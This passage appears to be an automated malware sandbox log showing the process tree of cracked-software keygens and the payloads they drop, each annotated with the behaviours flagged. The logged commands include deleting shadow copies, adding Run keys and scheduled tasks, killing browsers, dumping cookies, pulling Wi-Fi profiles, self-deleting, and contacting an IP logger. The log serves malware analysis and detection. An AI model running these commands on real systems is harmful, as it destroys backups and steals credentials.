PID:2580

C:\Users\Admin\AppData\Local\Temp\RarSFX5\key.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX5\key.exe"
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:1416

C:\Users\Admin\AppData\Local\Temp\RarSFX5\key.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX5\key.exe -txt -scanlocal -file:potato.dat
6⤵
- Executes dropped EXE
PID:2624

C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen-step-1.exe
keygen-step-1.exe
4⤵
- Executes dropped EXE
PID:2688

C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen-step-3.exe
keygen-step-3.exe
4⤵
- Executes dropped EXE
PID:2756

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen-step-3.exe"
5⤵
PID:2872

C:\Windows\SysWOW64\PING.EXE
ping 1.1.1.1 -n 1 -w 3000
6⤵
- Runs ping.exe
PID:2164

C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen-step-4.exe
keygen-step-4.exe
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: GetForegroundWindowSpam
PID:2804

C:\Users\Admin\AppData\Local\Temp\RarSFX4\002.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX4\002.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3060

C:\Users\Admin\AppData\Local\Temp\RarSFX4\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX4\Setup.exe"
5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:436

C:\Users\Admin\AppData\Local\Temp\sibA11.tmp\0\setup.exe
"C:\Users\Admin\AppData\Local\Temp\sibA11.tmp\0\setup.exe" -s
6⤵
- Executes dropped EXE
PID:3264

C:\Program Files (x86)\fjkw1lb5cxpb\aliens.exe
"C:\Program Files (x86)\fjkw1lb5cxpb\aliens.exe"
7⤵
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies system certificate store
PID:2952

C:\Windows\SysWOW64\msiexec.exe
msiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"
8⤵
- Enumerates connected drives
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
PID:3188

C:\Users\Admin\AppData\Local\Temp\0B44010BDDEFEFD3.exe
C:\Users\Admin\AppData\Local\Temp\0B44010BDDEFEFD3.exe 0011 installp1
8⤵
- Writes to the Master Boot Record (MBR)
PID:3912

C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe
C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe ThunderFW "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"
9⤵
PID:4596

C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe
"C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP
9⤵
- Writes to the Master Boot Record (MBR)
PID:2184

C:\Users\Admin\AppData\Local\Temp\1021C014A4C9A552.exe
C:\Users\Admin\AppData\Local\Temp\1021C014A4C9A552.exe /silent
9⤵
PID:4108

C:\Users\Admin\AppData\Local\Temp\is-B0QUR.tmp\1021C014A4C9A552.tmp
"C:\Users\Admin\AppData\Local\Temp\is-B0QUR.tmp\1021C014A4C9A552.tmp" /SL5="$60176,761193,121344,C:\Users\Admin\AppData\Local\Temp\1021C014A4C9A552.exe" /silent
10⤵
PID:1944

C:\Windows\SysWOW64\cmd.exe
cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\0B44010BDDEFEFD3.exe"
9⤵
PID:5956

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 3
10⤵
- Runs ping.exe
PID:4052

C:\Users\Admin\AppData\Local\Temp\0B44010BDDEFEFD3.exe
C:\Users\Admin\AppData\Local\Temp\0B44010BDDEFEFD3.exe 200 installp1
8⤵
- Writes to the Master Boot Record (MBR)
PID:3952

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
9⤵
PID:1860

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
10⤵
- Kills process with taskkill
PID:2412

C:\Windows\SysWOW64\cmd.exe
cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\0B44010BDDEFEFD3.exe"
9⤵
PID:4576

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 3
10⤵
- Runs ping.exe
PID:2672

C:\Windows\SysWOW64\cmd.exe
cmd /c ping 127.0.0.1 -n 3 & del "C:\Program Files (x86)\fjkw1lb5cxpb\aliens.exe"
8⤵
PID:4196

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 3
9⤵
- Runs ping.exe
PID:4320

C:\Users\Admin\AppData\Local\Temp\RarSFX4\jg2_2qua.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX4\jg2_2qua.exe"
5⤵
- Modifies system certificate store
PID:3268

C:\Users\Admin\Desktop\Remouse.Micro.Micro.v3.5.3.serial.maker.by.aaocg.exe
"C:\Users\Admin\Desktop\Remouse.Micro.Micro.v3.5.3.serial.maker.by.aaocg.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1248

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:240

C:\Users\Admin\AppData\Local\Temp\RarSFX0\intro.exe
intro.exe 1O5ZF
4⤵
- Executes dropped EXE
PID:996

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
keygen-pr.exe -p83fsase3Ge
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1320

C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1236

C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
6⤵
- Executes dropped EXE
PID:620

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
keygen-step-1.exe
4⤵
- Executes dropped EXE
PID:1604

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
keygen-step-4.exe
4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:316

C:\Users\Admin\AppData\Local\Temp\RarSFX2\002.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\002.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1940

C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"
5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2604

C:\Users\Admin\AppData\Local\Temp\sib1019.tmp\0\setup.exe
"C:\Users\Admin\AppData\Local\Temp\sib1019.tmp\0\setup.exe" -s
6⤵
- Executes dropped EXE
PID:3304

C:\Program Files (x86)\dz7d9shn0mvi\aliens.exe
"C:\Program Files (x86)\dz7d9shn0mvi\aliens.exe"
7⤵
PID:3964

C:\Windows\SysWOW64\cmd.exe
cmd /c ping 127.0.0.1 -n 3 & del "C:\Program Files (x86)\dz7d9shn0mvi\aliens.exe"
8⤵
PID:1676

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 3
9⤵
- Runs ping.exe
PID:2128

C:\Users\Admin\AppData\Local\Temp\RarSFX2\jg2_2qua.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\jg2_2qua.exe"
5⤵
PID:4340

C:\Users\Admin\Desktop\Magic_File_v3_keygen_by_KeygenNinja.exe
"C:\Users\Admin\Desktop\Magic_File_v3_keygen_by_KeygenNinja.exe"
2⤵
- Executes dropped EXE
PID:2356

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX6\keygen.bat" "
3⤵
- Loads dropped DLL
PID:2144

C:\Users\Admin\AppData\Local\Temp\RarSFX6\keygen-pr.exe
keygen-pr.exe -p83fsase3Ge
4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2696

C:\Users\Admin\AppData\Local\Temp\RarSFX7\key.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX7\key.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2652

C:\Users\Admin\AppData\Local\Temp\RarSFX7\key.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX7\key.exe -txt -scanlocal -file:potato.dat
6⤵
- Executes dropped EXE
PID:3024

C:\Users\Admin\AppData\Local\Temp\RarSFX6\keygen-step-3.exe
keygen-step-3.exe
4⤵
- Executes dropped EXE
PID:2876

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX6\keygen-step-3.exe"
5⤵
PID:2164

C:\Windows\SysWOW64\PING.EXE
ping 1.1.1.1 -n 1 -w 3000
6⤵
- Runs ping.exe
PID:3008

C:\Users\Admin\AppData\Local\Temp\RarSFX6\keygen-step-4.exe
keygen-step-4.exe
4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2964

C:\Users\Admin\AppData\Local\Temp\RarSFX8\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX8\Setup.exe"
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
PID:1288

C:\Windows\SysWOW64\rundll32.exe
C:\Windows\system32\rundll32.exe 001 install5
6⤵
- Blocklisted process makes network request
- Writes to the Master Boot Record (MBR)
PID:3284

C:\Windows\SysWOW64\rundll32.exe
C:\Windows\system32\rundll32.exe 002 install5
6⤵
PID:3948

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
7⤵
PID:3828

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
8⤵
- Kills process with taskkill
PID:3792

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im firefox.exe
7⤵
PID:2384

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im firefox.exe
8⤵
- Kills process with taskkill
PID:1812

C:\Windows\SysWOW64\rundll32.exe
C:\Windows\system32\rundll32.exe 003 install5
6⤵
- Suspicious use of SetThreadContext
PID:4012

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe"
7⤵
- Suspicious use of SetWindowsHookEx
PID:3132

C:\Windows\SysWOW64\cmd.exe
cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RarSFX8\Setup.exe"
6⤵
PID:4024

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 3
7⤵
- Runs ping.exe
PID:3668

C:\Users\Admin\AppData\Local\Temp\RarSFX8\BTRSetp.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX8\BTRSetp.exe"
5⤵
- Suspicious use of SetThreadContext
PID:3396

C:\Users\Admin\AppData\Local\Temp\RarSFX8\BTRSetp.exe
"{path}"
6⤵
PID:4004

C:\Users\Admin\AppData\Local\Temp\RarSFX8\BTRSetp.exe
"{path}"
6⤵
PID:3968

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3968 -s 904
7⤵
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
PID:4828

C:\Users\Admin\AppData\Local\Temp\RarSFX8\juppp.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX8\juppp.exe"
5⤵
- Adds Run key to start application
PID:3676

C:\Users\Admin\AppData\Local\Temp\jfiag_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fjgha23_fa.txt
6⤵
PID:4428

C:\Users\Admin\AppData\Local\Temp\jfiag_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fjgha23_fa.txt
6⤵
PID:4924

C:\Users\Admin\AppData\Local\Temp\RarSFX8\id6.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX8\id6.exe"
5⤵
- Suspicious use of SetWindowsHookEx
PID:1160

C:\Users\Admin\AppData\Local\Temp\RarSFX8\lcx.exe
lcx.exe version2.txt
6⤵
PID:2036

C:\Users\Admin\AppData\Local\Temp\RarSFX8\setup_full.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX8\setup_full.exe"
5⤵
PID:2188

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX8\setup_full.exe"
6⤵
PID:1420

C:\Windows\SysWOW64\PING.EXE
ping 1.1.1.1 -n 1 -w 3000
7⤵
- Runs ping.exe
PID:2548

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX8\DreamTrips.bat" "
5⤵
PID:4648

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/1Hgx67
6⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:4716

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4716 CREDAT:275457 /prefetch:2
7⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2568

C:\Users\Admin\AppData\Local\Temp\RarSFX8\wyfdggaa.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX8\wyfdggaa.exe"
5⤵
- Checks whether UAC is enabled
- Suspicious use of SetWindowsHookEx
PID:3376

C:\Users\Admin\Desktop\LtHv0O2KZDK4M637.exe
"C:\Users\Admin\Desktop\LtHv0O2KZDK4M637.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1732

C:\Users\Admin\Desktop\api.exe
"C:\Users\Admin\Desktop\api.exe"
2⤵
- Executes dropped EXE
- Enumerates connected drives
- Writes to the Master Boot Record (MBR)
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:2308

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" "https://adlice.com/thanks-downloading-diag/?utm_campaign=diag&utm_source=soft&utm_medium=btn"
3⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:1208

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1208 CREDAT:275457 /prefetch:2
4⤵
- Drops desktop.ini file(s)
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:4436

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1208 CREDAT:930819 /prefetch:2
4⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:6060

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1208 CREDAT:668676 /prefetch:2
4⤵
- Suspicious use of SetWindowsHookEx
PID:2164

C:\Users\Admin\Desktop\31.exe
"C:\Users\Admin\Desktop\31.exe"
2⤵
- Executes dropped EXE
PID:3036

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3F.tmp\40.tmp\41.bat C:\Users\Admin\Desktop\31.exe"
3⤵
PID:2980

C:\Program Files\Java\jre7\bin\javaw.exe
"C:\Program Files\Java\jre7\bin\javaw.exe" -jar "C:\Users\Admin\AppData\Roaming\1.jar"
4⤵
PID:2536

C:\Users\Admin\AppData\Roaming\2.exe
C:\Users\Admin\AppData\Roaming\2.exe
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1076

C:\Users\Admin\AppData\Roaming\2.exe
C:\Users\Admin\AppData\Roaming\2.exe
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
PID:2148

C:\Users\Admin\AppData\Roaming\3.exe
C:\Users\Admin\AppData\Roaming\3.exe
4⤵
- Executes dropped EXE
- Checks QEMU agent file
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:2632

C:\Users\Admin\AppData\Roaming\3.exe
C:\Users\Admin\AppData\Roaming\3.exe
5⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4288

C:\Users\Admin\AppData\Roaming\4.exe
C:\Users\Admin\AppData\Roaming\4.exe
4⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2744

C:\Windows\SysWOW64\regsvr32.exe
C:\Windows\system32\regsvr32.exe -s C:\Users\Admin\AppData\Roaming\4.dll f1 C:\Users\Admin\AppData\Roaming\4.exe@2744
5⤵
PID:3712

C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\AppData\Roaming\4.dll,f0
6⤵
- Blocklisted process makes network request
PID:3800

C:\Users\Admin\AppData\Roaming\5.exe
C:\Users\Admin\AppData\Roaming\5.exe
4⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2588

C:\Users\Admin\AppData\Roaming\6.exe
C:\Users\Admin\AppData\Roaming\6.exe
4⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1776

C:\Users\Admin\AppData\Roaming\7.exe
C:\Users\Admin\AppData\Roaming\7.exe
4⤵
- Executes dropped EXE
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of SetWindowsHookEx
PID:1900

C:\Users\Admin\AppData\Roaming\8.exe
C:\Users\Admin\AppData\Roaming\8.exe
4⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of AdjustPrivilegeToken
PID:2352

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v feeed /t REG_SZ /d C:\Windows\system32\pcalua.exe" -a C:\Users\Admin\AppData\Roaming\feeed.exe"
5⤵
PID:1632

C:\Windows\SysWOW64\reg.exe
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v feeed /t REG_SZ /d C:\Windows\system32\pcalua.exe" -a C:\Users\Admin\AppData\Roaming\feeed.exe"
6⤵
- Adds Run key to start application
PID:2676

C:\Users\Admin\AppData\Roaming\feeed.exe
"C:\Users\Admin\AppData\Roaming\feeed.exe"
5⤵
- Suspicious use of SetThreadContext
PID:5016

C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe
"C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe"
6⤵
- Suspicious behavior: SetClipboardViewer
- Suspicious use of SetWindowsHookEx
PID:3704

C:\Windows\SysWOW64\netsh.exe
"netsh" wlan show profile
7⤵
PID:2192

C:\Users\Admin\AppData\Roaming\9.exe
C:\Users\Admin\AppData\Roaming\9.exe
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2180

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wWTxgR" /XML "C:\Users\Admin\AppData\Local\Temp\tmp9AC9.tmp"
5⤵
- Creates scheduled task(s)
PID:3664

C:\Users\Admin\AppData\Roaming\9.exe
"{path}"
5⤵
PID:4628

C:\Users\Admin\AppData\Roaming\9.exe
"{path}"
5⤵
PID:4648

C:\Users\Admin\AppData\Roaming\9.exe
"{path}"
5⤵
PID:4656

C:\Users\Admin\AppData\Roaming\9.exe
"{path}"
5⤵
PID:4680

C:\Users\Admin\AppData\Roaming\9.exe
"{path}"
5⤵
PID:4700

C:\Windows\SysWOW64\netsh.exe
"netsh" wlan show profile
6⤵
PID:1848

C:\Users\Admin\AppData\Roaming\10.exe
C:\Users\Admin\AppData\Roaming\10.exe
4⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2076

C:\Users\Admin\AppData\Roaming\11.exe
C:\Users\Admin\AppData\Roaming\11.exe
4⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Maps connected drives based on registry
- Suspicious use of SetThreadContext
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1844

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AnLKhBlJfQ" /XML "C:\Users\Admin\AppData\Local\Temp\tmp25B9.tmp"
5⤵
- Creates scheduled task(s)
PID:4524

C:\Users\Admin\AppData\Roaming\11.exe
"{path}"
5⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:2828

C:\Users\Admin\AppData\Roaming\12.exe
C:\Users\Admin\AppData\Roaming\12.exe
4⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2124

C:\Users\Admin\AppData\Roaming\13.exe
C:\Users\Admin\AppData\Roaming\13.exe
4⤵
- Executes dropped EXE
- Checks QEMU agent file
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:1604

C:\Users\Admin\AppData\Roaming\13.exe
C:\Users\Admin\AppData\Roaming\13.exe
5⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4312

C:\Users\Admin\AppData\Local\Temp\Trainbandanigon6\Styltendeschris.exe
"C:\Users\Admin\AppData\Local\Temp\Trainbandanigon6\Styltendeschris.exe"
6⤵
- Checks QEMU agent file
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:1908

C:\Users\Admin\AppData\Local\Temp\Trainbandanigon6\Styltendeschris.exe
"C:\Users\Admin\AppData\Local\Temp\Trainbandanigon6\Styltendeschris.exe"
7⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3760

C:\Users\Admin\AppData\Roaming\14.exe
C:\Users\Admin\AppData\Roaming\14.exe
4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2648

C:\Users\Admin\AppData\Roaming\15.exe
C:\Users\Admin\AppData\Roaming\15.exe
4⤵
- Executes dropped EXE
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of SetWindowsHookEx
PID:1944

C:\Users\Admin\AppData\Roaming\16.exe
C:\Users\Admin\AppData\Roaming\16.exe
4⤵
- Executes dropped EXE
- Modifies extensions of user files
- Drops startup file
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: RenamesItself
PID:816

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
5⤵
PID:952

C:\Windows\system32\mode.com
mode con cp select=1251
6⤵
PID:3628

C:\Windows\system32\vssadmin.exe
vssadmin delete shadows /all /quiet
6⤵
- Interacts with shadow copies
PID:4044

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
5⤵
PID:4316

C:\Windows\system32\mode.com
mode con cp select=1251
6⤵
PID:6116

C:\Windows\system32\vssadmin.exe
vssadmin delete shadows /all /quiet
6⤵
- Interacts with shadow copies
PID:1112

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"
5⤵
PID:5508

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"
5⤵
- Modifies Internet Explorer settings
PID:5876

C:\Users\Admin\AppData\Roaming\17.exe
C:\Users\Admin\AppData\Roaming\17.exe
4⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2012

C:\Users\Admin\AppData\Roaming\18.exe
C:\Users\Admin\AppData\Roaming\18.exe
4⤵
- Executes dropped EXE
- Maps connected drives based on registry
- Suspicious use of SetThreadContext
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
PID:3068

C:\Users\Admin\AppData\Roaming\19.exe
C:\Users\Admin\AppData\Roaming\19.exe
4⤵
- Executes dropped EXE
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:3008

C:\Users\Admin\AppData\Roaming\19.exe
C:\Users\Admin\AppData\Roaming\19.exe
5⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4936

C:\Users\Admin\AppData\Roaming\20.exe
C:\Users\Admin\AppData\Roaming\20.exe
4⤵
- Executes dropped EXE
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of SetWindowsHookEx
PID:3136

C:\Users\Admin\AppData\Roaming\21.exe
C:\Users\Admin\AppData\Roaming\21.exe
4⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:3384

C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
dw20.exe -x -s 476
5⤵
PID:3124

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3384 -s 500
5⤵
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
PID:1720

C:\Users\Admin\AppData\Roaming\22.exe
C:\Users\Admin\AppData\Roaming\22.exe
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:3552

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
5⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:4800

C:\Users\Admin\AppData\Roaming\23.exe
C:\Users\Admin\AppData\Roaming\23.exe
4⤵
- Executes dropped EXE
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:3744

C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
C:\Users\Admin\AppData\Roaming\23.exe
5⤵
- Checks QEMU agent file
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3808

C:\Users\Admin\AppData\Roaming\24.exe
C:\Users\Admin\AppData\Roaming\24.exe
4⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:3832

C:\Users\Admin\AppData\Roaming\24.exe
"{path}"
5⤵
- Drops file in Drivers directory
- Suspicious use of SetWindowsHookEx
PID:1552

C:\Windows\SysWOW64\netsh.exe
"netsh" wlan show profile
6⤵
PID:3888

C:\Users\Admin\AppData\Roaming\25.exe
C:\Users\Admin\AppData\Roaming\25.exe
4⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of SetWindowsHookEx
PID:3868

C:\Users\Admin\AppData\Roaming\26.exe
C:\Users\Admin\AppData\Roaming\26.exe
4⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of AdjustPrivilegeToken
PID:3956

C:\Windows\SysWOW64\schtasks.exe
